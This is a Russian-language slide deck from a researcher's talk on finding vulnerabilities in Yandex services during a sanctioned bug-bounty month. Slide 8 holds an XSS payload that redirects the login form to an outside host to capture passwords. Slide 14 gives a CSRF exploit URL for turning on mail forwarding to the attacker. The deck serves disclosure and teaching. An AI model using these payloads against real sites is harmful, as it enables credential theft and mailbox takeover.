'

Месяц поиска уязвимостей Яндекса

Понравилась презентация – покажи это...





Слайд 0

Месяц поиска уязвимостей Яндекса опыт участия Эльдар Заитов @kyprizel


Слайд 1

Что это было? Что искать: межсайтовый скриптинг (XSS); межсайтовая подделка запросов (CSRF); небезопасное управление сессией; инъекции; ошибки в механизмах аутентификации и авторизации; Где искать: *.yandex.ru, com, com.tr, kz, ua, by, net, st; *.ya.ru. *.moikrug.ru.


Слайд 2

Почему искать? Интерес Не часто компании такого уровня дают полный карт-бланш в действиях – хочется посмотреть как всё устроено внутри, в случае успешной атаки; Интерес Понять, каков же реальный уровень защищенности сервисов одной из крупнейших IT компаний в России; Деньги В случае победы, $5k неплохой бонус за работу, сделаную ради интереса.


Слайд 3

Что искал RCE, различные переполняшки; SQL injection; Способы проникновения во внутреннюю инфраструктуру; XSS; CSRF;


Слайд 4

Как искал Представить, как оно могло бы работать; Сделать легкий ручной fuzzing, посмотреть на реакцию. Где искал mail.yandex.ru


Слайд 5

Что нашел Пассивные XSS; Некритичные раскрытия данных; Различные бесполезные tricks; CSRF; да, я знаю, что это lame ;)


Слайд 6

XSS уязвимость Доверенный параметр retpath в passport.yandex.ru


Слайд 7

XSS exploit Как использовать максимально эффективно? Украсть не сессию, но логин и пароль.


Слайд 8

<script> window.onload=function() { document.forms['MainLogin'].action='//kyprizel.net/p.php'; } </script>


Слайд 9

Раскрытия Neo2 XML + Oracle PL/SQL Neo2 handlers


Слайд 10

Раскрытия Modjs.js …


Слайд 11


Слайд 12

Tricks Произвольные GET запросы через Ленту в том числе внутри DMZ: blackbox.yandex.net csearch.mail.yandex.net Сканирование портов через mail collector; nothing interesting :(


Слайд 13

CSRF ckey Не работающая CSRF защита в интерфейсе neo Как использовать максимально эффективно? - Включить форвардинг писем на свой адрес.


Слайд 14

CSRF exploit Step 1 http://mail.yandex.ru/neo2/#setup/filters-confirm/e=Ut7tUs8g8jFFRbI4JOC%2ALUKGjDmZsg%2ANtGNtsYGO66aSjD%2AjgMzkllOOEUyjbUnVLiRMEBkrx34%3D


Слайд 15


Слайд 16

CSRF exploit Step 2 PROFIT!


Слайд 17


Слайд 18

Вопросы? kyprizel@gmail.com @kyprizel


×

HTML:





Ссылка: